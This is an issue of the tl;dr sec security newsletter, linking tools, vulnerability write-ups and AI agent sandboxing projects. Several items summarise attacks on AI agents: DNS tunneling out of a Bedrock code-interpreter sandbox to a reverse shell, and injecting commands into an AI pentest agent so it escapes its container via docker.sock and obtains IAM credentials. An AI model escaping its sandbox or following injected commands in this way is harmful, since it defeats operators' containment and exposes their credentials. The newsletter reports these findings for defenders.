[tl;dr sec] #321 – Sandboxing AI Agents, Trivy Compromised, Pentesting AWS’ AI Pentester

Phew, stay strong my friends, we’re almost through the BSidesSF and RSAC montage  

Too many to list them all, but some quick thoughts and moments that stuck out:

• Thank you to everyone who come to the inaugural tl;dr sec community meet-up! I had a blast Also shout-out to Scott Behrens and Travis McPeak for joining me for a fireside chat.

• Anna Westelius gave an inspiring BSidesSF keynote about reasons for us security folks to be optimistic.

• It was fun joining my friends Ken Johnson, Seth Law, Kevin McDermott, and Astha Singhal on an Absolute AppSec panel at BSidesSF.

• Delicious KBBQ with a bunch of other security creator nerds, H/T Ashish and Shilpi of the Cloud Security Podcast for organizing!

• Huge thanks to Decibel’s Dan Nguyen-Huu and Jon Sakoda for hosting an awesome set of lightning talks, which my bud Daniel Miessler also helped organize. Great talks from Rob Ragan, Jackie Bow, Andrew Becherer, and Sydney Marrone!

• Randomly meeting former NSA Director Rob Joyce! H/T Lina Lau, whose company is working on some impactful stuff  

• Hearing from folks who were moved by my talk last BSidesSF about vulnerability This had the biggest impact on me.

AI adoption is accelerating across cloud environments, from LLMs to autonomous agents and complex data pipelines. But without dedicated AI security posture management (AI-SPM), these innovations introduce a new class of risks that traditional tools can’t address.

From exposed training data to overprivileged AI agents, the attack surface is expanding faster than security teams can keep up.

Download the guide to learn a five-step framework to gain visibility, assess risk and secure AI across your cloud environment.

ChiChou/vscode-frida
A VSCode extension providing comprehensive IDE for Frida dynamic instrumentation, featuring a sidebar for listing apps/processes on local/USB/remote devices, interactive panels for browsing modules/exports and classes/methods (Java/Objective-C), and one-click hook generation for native functions, ObjC selectors, and Java methods.

How “Strengthening Crypto” Broke Authentication: FreshRSS and bcrypt’s 72-Byte Limit
Pentester Lab’s Louis Nyffenegger analyzes CVE-2025-68402, an authentication bypass in the development branch of FreshRSS a self-hosted RSS aggregator, caused by a “strengthen crypto” commit that replaced SHA-1 (40 chars) with SHA-256 (64 chars) for nonce generation. The longer nonce, when concatenated with the bcrypt hash before verification, pushed the password-dependent portion of the hash beyond bcrypt’s 72-byte truncation limit, meaning password_verify() only checked the nonce plus the algorithm identifier ($2y$10$) and one salt character, none of which depend on the actual password.

“A commit meant to strengthen the crypto ended up removing the need for a valid password.”  

The browser runtime sits between your website < > customers, bots, AI agents, and fraudsters. No one is watching it. And agents now access websites on behalf of humans, adding the risk of consumer agents being manipulated by script injections from third-party code. Grab this report to see data on: the new threat of locally hosted stealth browsers, a 15x rise in user-action AI agents, 275% increase on discussions of bot traffic, and results of an industry survey on how practitioners are preparing against AI-agent driven website fraud.

I could definitely see the bar rising for preventing AI-agent driven fraud or bot abuse given improvements in AI + browser use. I’m curious how the secure this new world.

IAMTrail
AWS silently updates Managed IAM policies all the time. This project by Victor Grenu tracks the full version history and diffs for 1525 AWS Managed IAM Policies, archived since 2019.

Pwning AI Code Interpreters in AWS Bedrock AgentCore
Friend of the newsletter BeyondTrust’s Kinnaird McQuade discovered that the AWS Bedrock AgentCore Interpreter’s Sandbox network mode (“complete isolation with no external access”) does allow public DNS queries. The post walks through using that capability to establish bidirectional communication (command and control, C2) using a custom tunneling protocol via DNS queries and responses, obtain a full interactive reverse shell, exfiltrating data, and performing command execution with the Code Interpreter’s IAM role. GitHub PoC.

Result: “AWS communicated that a fix will not be made and it will change the documentation’s description of sandbox mode instead. AWS awarded the security researcher with a $100 gift card to the AWS Gear Shop.”

This post actually had a pretty good amount of details and context, nice. I also found it interesting how performance dropped when using an LLM with knowledge cutoff before the CVE Bench release- is it doing better due to “memorizing” the answers or is it just a worse model because it’s older?  

1. The DNS confusion bug allowed attackers to manipulate Route53 private hosted zones to trick the agent into pentesting public domains they don’t own by exploiting the “Unreachable” domain status and DNS record verification timing.

2. Richard was able to trick the agent into hacking itself, obtaining a reverse shell with root access to the agent sandbox by injecting commands into debug messages, and escaping the container through the mounted /run/docker.sock to access the host EC2 instance and its IAM role credentials.

3. He found the agent sometimes performs unnecessarily destructive actions like using DROP TABLE for SQL injection probes.

4. The agent can expose unredacted passwords in pentest reports.

Something like this makes a lot of sense to me. We should be taking all of the lessons we’ve learned over time from various package registries and language ecosystems and ideally building them in from the beginning with new things like Skills.

mandiant/speakeasy
By Mandiant: A Windows malware emulation framework that executes binaries, drivers, and shellcode in a modeled Windows runtime instead of a full VM. It emulates APIs, process/thread behavior, filesystem, registry, and network activity so samples can keep moving through realistic execution paths.

FancyBear Exposed: Major OPSEC Blunder Inside Russian Espionage Ops
Ctrl-Alt-Intel discovered an exposed open-directory on a FancyBear (APT28/GRU) C2 server that revealed the group’s complete toolkit, telemetry logs, and exfiltrated data from a 500+ day espionage campaign targeting government and military entities across Ukraine, Romania, Bulgaria, Greece, Serbia, and North Macedonia. The exposed server contained 2,800+ exfiltrated emails, 240+ credential sets with TOTP 2FA secrets, and more.

“FancyBear developed a modular, multi-platform exploitation toolkit where a victim simply opening a malicious email – with no further clicks – could result in their credentials stolen, their 2FA bypassed, emails within their mailbox exfiltrated, and a silent forwarding rule established that persists indefinitely.”

Islands of Invariance
Rasta Mouse (maybe Rasta Mouse on X, Daniel Duggan?) describes how Crystal Palace now includes an automatic YARA generator that creates signatures based on “islands of invariance” (predictable, unchanged code patterns after optimization).

A scalpel, a hammer, and a foot gun
Raphael Mudge has released ised, a program rewriting tool for Crystal Palace that surgically inserts or replaces code at instruction pattern matches to break content signatures. The tool uses a two-pass implementation with prepend/append/replace buckets and supports specific/generic/mnemonic pattern matching from Crystal Palace’s disassembler output.

“A potential outcome is that researchers building tools on this platform may feel quite comfortable releasing Yara rules for all of their capability. It’s no loss, because they and their users would likely have a private ised-cocktail ready to go. What would change in red teaming (or cybersecurity even), if there was no fear of ‘burning a tool’ because of its content tells and behavior was the only meaningful battleground?”

ghostvectoracademy/DLLHijackHunter
By GhostVector Academy: An automated Windows DLL hijacking detection tool that discovers, validates, and confirms exploitable DLL hijack opportunities through a four-phase pipeline: discovery (enumerates binaries across services, scheduled tasks, startup items, COM objects, and AutoElevate UAC bypass vectors), filtration (eliminates false positives through hard and soft gates), canary confirmation (deploys a harmless canary DLL and triggers the binary to prove the hijack works), and scoring (0-100% confidence plus 0-10 impact score based on privilege gained, trigger reliability, and stealth).

NVIDIA/NemoClaw
An open source referencer stack that simplifies running OpenClaw agents inside NVIDIA OpenShell sandboxes with multi-layer security controls including Landlock, seccomp, network namespaces, and policy-enforced egress filtering. More below.

NVIDIA/OpenShell
OpenShell provides a sandboxed execution environment for AI agents that enforces declarative YAML policies to prevent unauthorized file access, data exfiltration, and uncontrolled network activity. The system runs as a K3s cluster inside a single Docker container and applies defense-in-depth across four policy domains: filesystem (read/write restrictions), network (outbound connection control with HTTP method and path-level enforcement), process (privilege escalation blocking), and inference (model API call routing).

OpenShell supports Claude, OpenCode, Codex, OpenClaw, and Ollama agents out of the box and manages credentials as injectable providers that never touch the sandbox filesystem. Security policies are hot-reloadable at runtime for network and inference layers, while filesystem and process restrictions are locked at sandbox creation

IronCurtain funnels all actions through a single MCP proxy chokepoint where a policy engine enforces rules written in plain English and compiled to deterministic policies. The system supports two sandbox modes: Code Mode runs LLM-generated TypeScript in isolated V8 with no filesystem/network access, while Docker Mode runs full agents like Claude Code CLI in containers with --network=none where a MITM proxy swaps fake API keys for real ones to maintain credential separation.

The plain-English constitution approach (inspired by Microsoft Research’s LEGALEASE) lets users write policies like “agent may read/write files in project directory but must ask before git push” which compile to deterministic allow/deny/escalate rules, with an optional auto-approver that recognizes explicit user intent to reduce alert fatigue.

Really thoughtful, great read. I love the architecture of making sure there’s a single security enforcement point, and how you can ease the burden of writing complex enforcement policies via natural language (but that are still enforced deterministically).

Have questions, comments, or feedback? Just reply directly, I’d love to hear from you.

If you find this newsletter useful and know other people who would too, I’d really appreciate if you’d forward it to them

P.S. Feel free to connect with me on LinkedIn